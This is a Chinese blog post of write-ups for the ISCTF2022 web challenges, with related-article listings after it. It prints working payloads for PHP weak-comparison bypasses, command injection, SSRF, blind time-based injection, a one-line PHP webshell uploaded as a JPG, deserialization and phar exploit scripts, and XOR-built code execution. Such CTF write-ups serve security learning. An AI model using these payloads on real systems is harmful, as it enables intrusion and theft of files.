ISCTF2022 WEB题解

最新推荐文章于 2024-05-05 18:57:14 发布
最新推荐文章于 2024-05-05 18:57:14 发布
阅读量458 收藏 4
点赞数 3
分类专栏: ctf 文章标签: php web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq2642343642/article/details/128962168
版权

直到现在才想起自己之前的题解只发到了个人博客没有发到CSDN上,发一下自己的博客链接,欢迎各位大佬来交流!

EASY-PHP01

思路:主要是考察php基础,查看源码让给hint,直接/?hint=1

打开发现一个弱比较一个强比较,用post传递ISCTF=114514a加字母绕过得到flag

EASY-PHP02

?NAME=1接着就是flag1,md5的弱类型比较,存在漏洞用0e表示的话可以绕过

故payload为?NAME=1&P0ST1=0&P0ST2=240610708得到flag1

GET1又是个弱类型比较,直接GET1=a就可以绕过,判断isnumeric也可以加字母绕过,故POST只需要传入

GET1=a&GET2=699a即可得到

得到的f2通过源码可以发现是进行了base64加密,拿去解密

%u0030%u0065%u0066%u0062%u002d%u0031%u0033%u0036%u0039%u002d%u0034%u0036%u0031%u0033%u002d%u0061%u0030%u0033%u0038%u002d%u0066%u0034%u0065%u0032%u0030%u0031%u0061%u0037%u0063%u0061%u0030%u0037%u007d

拿去hex解密得到后半段,f1也是hex,直接用在线工具解密即可

ISCTF{37470efb-1369-4613-a038-f4e201a7ca07}

FakeWeb

打开网址发现要进行跳转,直接抓包得到flag

       <meta http-equiv="refresh" content="0;url=https://www.bluesharkinfo.com">//跳转地址
        <!-- ISCTF{b9e6e2a5-8230-40a9-97de-883fb284def2} -->

simplephp

前面是正则匹配的规则,#代表/,两个\代表一个\

故payload:?str=/\\\\/Ilikeisctf/

一个点绕过 is_numeric

在数字的前面加上%09 %0a %0b %0c %0d任意一个都可以使其为真不影响判断。

参考ctfshow web115原题

trim不会过滤/f

?str=%22\\\\/Ilikeisctf%22&num=%0C36&cmd=system(%27cat%20../../../../flag%27);

curl

需要从本地访问,查看源码发现可以用urls直接访问即可,唯一一个一血呜呜呜

payload:?urls=localhost/flag.php

eazy-onlineshell

思路:访问rce提示让我们看看backup,访问www.zip得到Py源码

需要用post提交然后传入action

执行sleep 5发现有影响(注意前面后面加个东西),但是试了下curl啥的都没反应

说明可以进行时间注入,直接用if进行爆破跑出flag即可

act=1if [ $(head -c 43 flag) == "ISCTF{142b7761-dab6-46a1-8659-1a7567c91134§1§" ]; then sleep 100; else echo "String1 and String2 are not equal."; fi1

crazy-onlineshell

同上

easy_upload

首先访问www.rar(比赛的时候试了www.zip,index.php.bak等其他的加密,已经气死了),得到源码可以发现了过滤了哪些字符

<?php
error_reporting(0);
header("Content-Type:text/html;charset=utf-8");
$file = $_GET['file'];
if(isset($file)){
if (preg_match("/flag|\.\.|\/\//i", $file)) {
echo "no hack";
 exit();
} 
include $file;
}else{
    include("upload.php");
}
?>

有文件包含,如果说能上传一个文件就可以直接访问,故进行文件上传

Content-Disposition: form-data; name="file"; filename="1.jpg"
Content-Type: image/jpeg
​
<?=system("cat /f*");?>

然后文件包含,payload如下:

index.php?file=uplO4d/1.jpg

傻柱

(比赛的时候没有跑出来,是否放弃跑其他数据库的时候选择了Y,导致没出,害)

访问/login.php进入登陆发现是sql注入,直接上sqlmap当脚本小子,判断出是UA注入,然后直接读数据即可

sqlmap参数写

--level 5 --dump最后读出来就行了

咦 这个密码 怎么怪怪的

这个分段,猜测栅栏密码,总共5部分,key为5

得到

JFJUGVCGPNAF6M3BON4V6QSBKNCTGMRBPU======

有等号,然后猜测base,试了下base32得解

ISCTF{@_3asy_BASE32!}

猫和老鼠

一道反序列化加文件包含的题目,重点是反序列化,只要进入tostring就可以通过改变$v进行文件包含,但是在析构函数的时候$a的值,所以我是通过令$b指向$a的地址,那么通过改变$b则可改变$a,从而调用tostring,后续就是一个文件包含,直接用php://filter读取flag.php即可得到,exp如下

<?php
class mouse
{
    public $v="php://filter/read=convert.base64-encode/resource=flag.php";
​
    public function __toString()
    {
        echo "Good. You caught the mouse:";
        include($this->v);
    }
​
}
class cat
{
    public $a;
    public $b;
    public $c;
​
    /*public function __construct()
    {
        $this->b = &$this->a;
        $this->c = new mouse();
    }*/
​
    public function __destruct(){
        $this->dog();
        $this->b = $this->c;
        die($this->a);
    }
    public function dog()
    {
        $this->a = "I'm a vicious dog, Kitty";
    }
}
$a = new cat();
$a->b = & $a->a;
$a->c = new mouse();
echo serialize($a);
?>

rce?

主要考察了无字符rce这个点,需要构造字母来进行rce,参考一下p神的文章

一些不包含数字和字母的webshell | 离别歌 (leavesongs.com)

然后因为前面有了echo了,所以直接构造cat flag

这里我才用的是异或构造

(""^"{{{|``")(""^"``| /````");

然后再进行url编码如下

("%08%02%08%08%05%0d"^"%7b%7b%7b%7c%60%60")("%03%01%08%00%00%06%0c%01%07"^"%60%60%7c%20%2f%60%60%60%60");

得到flag

upload

试了半天才发现给了源码=-=

白盒测试,index.php主要是上传文件,重点在class.php

一直以为是这一串$this->ext = end(explode(".", $_FILES["file"]["name"]));进行后缀绕过,所有方法都试过了发现是第五空间原题,一个反序列化

能够用 check_img 的 file_exists 触发 phar 反序列化,进而触发 upload 的 wakeup 读取

exp:

exp:```<?php
class upload
{
     public $filename="/flag";
}
$p = new upload();
$phar = new Phar("test.phar");
$phar->startBuffering();
phar->setStub("<?php __HALT_COMPILER();?>");
$phar->setMetadata($p);
$phar->addFromString("test.txt", "test");
$phar->stopBuffering();
?>

改后缀为png上传直接访问?img_name=phar:///var/www/html/upoload/test.png得到flag

C1ybaby
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
西普WEB大部分题解
12-09
【标题】"西普WEB大部分题解"是一个针对网络安全领域中的Web安全训练平台——西普(CTF)的解题指南。这个资源包含了对西普平台上多种Web安全挑战的解答,旨在帮助那些参与CTF(Capture The Flag)比赛或者希望提升...
2022美赛B题题解-水电共享赛题题解.zip
01-21
【2022美赛B题 - 水电共享赛题题解】 美赛,全称为美国数学建模竞赛(MCM/ICM),是一项国际性的数学竞赛,旨在鼓励学生应用数学和计算机科学解决实际问题。2022年的美赛B题,即“水电共享”,是一个涉及到水资源...
ISCTF 2022 WEB WP分享
starttv的博客
11-04 1679
可以执行代码,进入这里首要要满足,num通过is_numeric的检测,并且不等于36,去空后依然不等于36,经过过滤方法后依然等于36。在进行===比较时,php会先判断两种字符串的类型是否相同,很显然两者都是字符串,第一个判断通过,再进行值的比较,两者是不相等的。2、=== :强等于。php 的 0 与任何字符串比较都为 true,这是不对的,但其实是正确的,因为字符串被强制转换后都成了 0。在进行==比较时,php会自动将字符串转为数字进行值的比较,在这里114512和114512s是相等的。
2022 ISCTF《MD5脏了》
qq_45332357的博客
10-30 409
2022 ISCTF《MD5脏了》
2024年最全ISCTF2024新生赛-MISC_blueshark ctf(1),2024年最新网络安全面试精讲
最新发布
2401_84545088的博客
05-05 1008
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
ISCTF2022 web wp
m0_60743498的博客
11-24 1085
先传入your name进入下一个判断 P0ST1不等于P0ST2,但是P0ST1等于P0ST2的md5值,这是md5的弱碰撞 GET1过滤了纯数字,用字母绕过,GET2大于678,不能为数字,数组绕过 构造payload: GET: [http://120.79.18.34:20120/?NAME=111&P0ST1=0&P0ST2=s1502113478a](http://120.79.18.34:20120/?NAME=111&P0ST1=0&P0ST2=s1502113478a)
ISCTF2022部分wp
m0_73952121的博客
11-07 931
ISCTF2022部分wp
ISCTF2022部分WP
y2xsec的博客
11-04 2340
ISCTF2022部分WP
CyBRICS CTF Quals 2019 Web 题解1
08-04
在CyBRICS CTF Quals 2019的Web挑战中,参赛者遇到了一系列涉及前端、后端以及加密解密的问题。以下是针对题目提供的部分解题思路和知识点的详细说明: 1. **Warmup**: - **URL重定向**:这个挑战中,网站最初...
2022年mathercup数学建模比赛d题题解
04-18
【2022年mathercup数学建模比赛d题题解】是一个关于数学建模竞赛的资源集合,其中包含了参赛者对问题的解答过程、思路解析以及相关的代码实现。这个压缩包文件提供了全面的解决方案,包括论文撰写、模型构建和求解...
ISCTF2022补充
starttv的博客
11-08 332
分析代码发现存在file_exit()函数并且可以上传文件,想到phar反序列化。上传一个带有一句话木马的jpg图片,再利用文件包含。用dirsearch工具扫描目录发现www.rar。尝试上传文件发现出了jpg图片,别的都不让上传。分析源码发现存在文件包含。源码index.php
ISCTF PWN WP 2022
GeekCmore的博客
11-07 1444
ISCTF PWN 部分题解 WP
ISCC-2022
ki10Moc的博客
06-06 3810
pyccwp
记录2022-ISCTF有意思的题目
m0_58543272的博客
11-05 436
2022isctf个人笔记
ISCTF赛后总结
xiaf5的博客
10-24 2262
学了一个月的菜鸡,第一次打ctf比赛,感觉自己实在太菜了,总结总结经验。 Web 跟着队友混,队友Web贼强,Web全AK. CRYPTO 弯弯曲曲的路 不合格的pwn手竟然拿到密码题的一血。。。 题目描述:一只古典的蓝鲨从一条路的尽头上下上下上的走过了弯弯曲曲的小路上,并且经过了5棵树还有5个银行。 打开下载的文件,文件名为zip格式提示用zip格式打开解压缩。 根据题目描述,应该是5组,每组5个 分组后仔细观察,发现flag是交叉式的。 ISCTF{Welc0nne_..
ISCTF-WEB(部分)
BvxiE的博客
12-26 748
过太久了,可以网址都找不到了,凡事不能拖…有天晚上学习完上面的文章,我突然发现一道题出现了一些奇奇怪怪的东西!有趣!康康你能不能发现它?
ISCTF2023 web方向wp超详细解析+做题思路(部分)
2301_76690905的博客
11-29 3871
题目:提示了一句话密码为1,直接蚁剑连靶场,密码连1进去就能看见flag1根目录有flag2flag3不可能一个个点,肯定是转去虚拟终端用命令找,在开虚拟终端之前看下.sh,一般都会放些提示我们就能知道,FLAG3 包含了 FLAG 变量的从第 21 个字符到末尾的部分,可以直接在虚拟终端输出 FLAG3 变量的值那我们先进入虚拟终端,然后cd /去到根目录,然后在根目录输出FLAG3 变量的值别的命令不知道为什么不是返回不了,就是权限不够,都已经root了(?
[NISACTF 2022]is secret------Flask下的SSTI
qq_73767109的博客
06-25 377
应该是要进行一个传参,随便传一个数进去会返回一个不一样的字符,传入该字符又得回原来的数,猜测应该是一个对称加密,但这远远不知道是什么。属性,它会以一个 dict ,返回函数所在模块命名空间中的所有变量。方法的操作系统中打开一个子进程,并执行cat /f*的命令。对包含函数全局变量的字典的引用,所有的函数都会有一个。题目标签是SSTI,于是尝试使用{{6*6}}作为占位符是因为这个变量在模板渲染时已经存在。传入后得到49说的确存在SSTI注入。网上找到脚本尝试{{7*7}} 加密。flask框架下模板注入。
csp-j2022复赛题解
09-18
csp-j2022复赛题解涉及到一个二元二次方程,并且需要进行化简和推导。首先,将给定的式子化简为n=pq pq-p-q^2=e*d,记为A。然后,根据范围n~k,可以使用动态规划来解决,复杂度为O(n^2*k)。转移的条件与序列最后一个点的坐标和添加点的个数有关。进一步推导,可以得到p*q=A B-2,记为C。由(p q)^2-4pq=(q-p)^2得到A^2-4(A B-2)=(p-q)^2,记为D。因此,q-p=sqrt(A^2-4*(A B-2)),得到D。根据p q=A q*p=D,可以得到q=(A D)/2,p=A-q。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值